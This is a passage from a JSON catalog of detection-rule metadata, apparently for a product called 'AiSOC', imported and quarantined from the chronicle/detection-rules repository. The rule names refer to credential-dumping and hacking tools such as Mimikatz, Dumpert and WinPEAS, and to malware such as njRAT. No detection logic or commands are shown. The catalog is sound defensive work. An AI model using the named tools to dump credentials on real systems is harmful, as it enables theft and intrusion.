rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_password_policy_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_password_policy_changed.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-saml-idp-configuration-change", "type": "detection", "name": "google_workspace_saml_idp_configuration_change", "description": "google_workspace_saml_idp_configuration_change", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-saml-idp-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_saml_idp_configuration_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_saml_idp_configuration_change.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-suspicious-login-and-google-drive-file-download", "type": "detection", "name": "google_workspace_suspicious_login_and_google_drive_file_download", "description": "google_workspace_suspicious_login_and_google_drive_file_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-suspicious-login-and-google-drive-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_suspicious_login_and_google_drive_file_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_suspicious_login_and_google_drive_file_download.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-suspicious-login-and-google-drive-file-share", "type": "detection", "name": "google_workspace_suspicious_login_and_google_drive_file_share", "description": "google_workspace_suspicious_login_and_google_drive_file_share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-suspicious-login-and-google-drive-file-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_suspicious_login_and_google_drive_file_share", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_suspicious_login_and_google_drive_file_share.yaral" } }, { "id": 
"chronicle-detection-rules-google-workspace-user-ou-changed", "type": "detection", "name": "google_workspace_user_ou_changed", "description": "google_workspace_user_ou_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-user-ou-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_user_ou_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/workspace/google_workspace_user_ou_changed.yaral" } }, { "id": "chronicle-detection-rules-google-workspace-user-unsuspended", "type": "detection", "name": "google_workspace_user_unsuspended", "description": "google_workspace_user_unsuspended", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/google-workspace-user-unsuspended.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "google_workspace_user_unsuspended", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/workspace/google_workspace_user_unsuspended.yaral" } }, { "id": "chronicle-detection-rules-graphrunner-suspicious-user-agent-strings", "type": "detection", "name": "graphrunner_suspicious_user_agent_strings", "description": "graphrunner_suspicious_user_agent_strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/graphrunner-suspicious-user-agent-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "graphrunner_suspicious_user_agent_strings", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/graph_activity/graphrunner_suspicious_user_agent_strings.yaral" } }, { "id": "chronicle-detection-rules-group-modification-logging", "type": "detection", "name": "group_modification_logging", "description": "group_modification_logging", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/group-modification-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "group_modification_logging", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/compliance/windows/group_modification_logging.yaral" } }, { "id": "chronicle-detection-rules-guildma-malware-detector-sysmon-behavior", "type": "detection", "name": "guildma_malware_detector_sysmon_behavior", "description": "guildma_malware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/guildma-malware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "guildma_malware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/guildma_malware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-hack-tool-user-agent", "type": "detection", "name": "hack_tool_user_agent", "description": "hack_tool_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hack-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"hack_tool_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/hack_tool_user_agent.yaral" } }, { "id": "chronicle-detection-rules-hacktool-dumpert-process-dumper-default-file", "type": "detection", "name": "hacktool_dumpert_process_dumper_default_file", "description": "hacktool_dumpert_process_dumper_default_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-dumpert-process-dumper-default-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_dumpert_process_dumper_default_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_dumpert_process_dumper_default_file.yaral" } }, { "id": "chronicle-detection-rules-hacktool-dumpert-process-dumper-exec", "type": "detection", "name": "hacktool_dumpert_process_dumper_exec", "description": "hacktool_dumpert_process_dumper_exec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-dumpert-process-dumper-exec.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_dumpert_process_dumper_exec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_dumpert_process_dumper_exec.yaral" } }, { "id": "chronicle-detection-rules-hacktool-generic-process-access", "type": "detection", "name": "hacktool_generic_process_access", "description": "hacktool_generic_process_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-generic-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_generic_process_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_generic_process_access.yaral" } }, { "id": "chronicle-detection-rules-hacktool-ironsharp-pack-execution", "type": "detection", "name": "hacktool_ironsharp_pack_execution", "description": "hacktool_ironsharp_pack_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/hacktool-ironsharp-pack-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_ironsharp_pack_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_ironsharp_pack_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-mimikatz-execution", "type": "detection", "name": "hacktool_mimikatz_execution", "description": "hacktool_mimikatz_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-mimikatz-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_mimikatz_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_mimikatz_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-purpleknight-execution", "type": "detection", "name": "hacktool_purpleknight_execution", "description": "hacktool_purpleknight_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-purpleknight-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_purpleknight_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_purpleknight_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-sharp-successor-execution", "type": "detection", "name": "hacktool_sharp_successor_execution", "description": "hacktool_sharp_successor_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-sharp-successor-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_sharp_successor_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_sharp_successor_execution.yaral" } }, { "id": "chronicle-detection-rules-hacktool-use", "type": "detection", "name": "hacktool_use", "description": "hacktool_use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_use", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/hacktool_use.yaral" } }, { "id": "chronicle-detection-rules-hacktool-winpeas-execution-patterns", "type": "detection", "name": "hacktool_winpeas_execution_patterns", "description": "hacktool_winpeas_execution_patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hacktool-winpeas-execution-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hacktool_winpeas_execution_patterns", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/hacktool_winpeas_execution_patterns.yaral" } }, { "id": "chronicle-detection-rules-hash-prevalence", "type": "detection", "name": "hash_prevalence", "description": "hash_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hash-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hash_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/hash_prevalence.yaral" } }, { "id": "chronicle-detection-rules-hawkeye-keylogger-file-creation-and-create-process-detector-sysmon-behavior", "type": "detection", "name": "hawkeye_keylogger_file_creation_and_create_process_detector_sysmon_behavior", "description": "hawkeye_keylogger_file_creation_and_create_process_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hawkeye-keylogger-file-creation-and-create-process-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hawkeye_keylogger_file_creation_and_create_process_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/hawkeye_keylogger_file_creation_and_create_process_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-hidden-cobra-fastcash-malware-sysmon", "type": "detection", "name": 
"hidden_cobra_fastcash_malware_sysmon", "description": "hidden_cobra_fastcash_malware_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hidden-cobra-fastcash-malware-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hidden_cobra_fastcash_malware_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/hidden_cobra_fastcash_malware__sysmon.yaral" } }, { "id": "chronicle-detection-rules-hiding-files-with-attribexe", "type": "detection", "name": "hiding_files_with_attribexe", "description": "hiding_files_with_attribexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hiding-files-with-attribexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hiding_files_with_attribexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/hiding_files_with_attrib_exe.yaral" } }, { "id": "chronicle-detection-rules-high-risk-user-download-executable-from-macro", "type": "detection", "name": "high_risk_user_download_executable_from_macro", "description": "high_risk_user_download_executable_from_macro", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/high-risk-user-download-executable-from-macro.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "high_risk_user_download_executable_from_macro", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/network/high_risk_user_download_executable_from_macro.yaral" } }, { "id": "chronicle-detection-rules-hooking-detection-sysmon", "type": "detection", "name": "hooking_detection_sysmon", "description": "hooking_detection_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hooking-detection-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hooking_detection_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", 
"license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/hooking_detection__sysmon.yaral" } }, { "id": "chronicle-detection-rules-hostdomain-enumeration-with-wmic", "type": "detection", "name": "hostdomain_enumeration_with_wmic", "description": "hostdomain_enumeration_with_wmic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hostdomain-enumeration-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "hostdomain_enumeration_with_wmic", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/host_domain_enumeration_with_wmic.yaral" } }, { "id": "chronicle-detection-rules-hworm-and-njrat-ratbackdoor-sysmon", "type": "detection", "name": "hworm_and_njrat_ratbackdoor_sysmon", "description": "hworm_and_njrat_ratbackdoor_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/hworm-and-njrat-ratbackdoor-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "hworm_and_njrat_ratbackdoor_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/hworm_and_njrat_rat_backdoor__sysmon.yaral" } }, { "id": "chronicle-detection-rules-impacket-wmiexec-cisa-report", "type": "detection", "name": "impacket_wmiexec_cisa_report", "description": "impacket_wmiexec_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/impacket-wmiexec-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "impacket_wmiexec_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/impacket_wmiexec_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-info-certutil-urlcache", "type": "detection", "name": "info_certutil_urlcache", "description": "info_certutil_urlcache", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-certutil-urlcache.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "chronicle/detection-rules", "source_id": "info_certutil_urlcache", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/certutil_urlcache.yaral" } }, { "id": "chronicle-detection-rules-info-command-line-regedit", "type": "detection", "name": "info_command_line_regedit", "description": "info_command_line_regedit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-command-line-regedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_command_line_regedit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/command_line_regedit.yaral" } }, { "id": "chronicle-detection-rules-info-dns-lookup-exact", "type": "detection", "name": "info_dns_lookup_exact", "description": "info_dns_lookup_exact", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-dns-lookup-exact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"info_dns_lookup_exact", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/dns_lookup_exact.yaral" } }, { "id": "chronicle-detection-rules-info-dns-lookup-partial", "type": "detection", "name": "info_dns_lookup_partial", "description": "info_dns_lookup_partial", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-dns-lookup-partial.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_dns_lookup_partial", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/dns_lookup_partial.yaral" } }, { "id": "chronicle-detection-rules-info-dns-lookup-suffix", "type": "detection", "name": "info_dns_lookup_suffix", "description": "info_dns_lookup_suffix", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-dns-lookup-suffix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_dns_lookup_suffix", "source_commit": "74dd490", "license": "Apache-2.0", 
"license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/dns_lookup_suffix.yaral" } }, { "id": "chronicle-detection-rules-info-file-batch-executed", "type": "detection", "name": "info_file_batch_executed", "description": "info_file_batch_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-batch-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_batch_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/info/file_batch_executed.yaral" } }, { "id": "chronicle-detection-rules-info-file-batch-written", "type": "detection", "name": "info_file_batch_written", "description": "info_file_batch_written", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/info-file-batch-written.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "info_file_batch_written", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
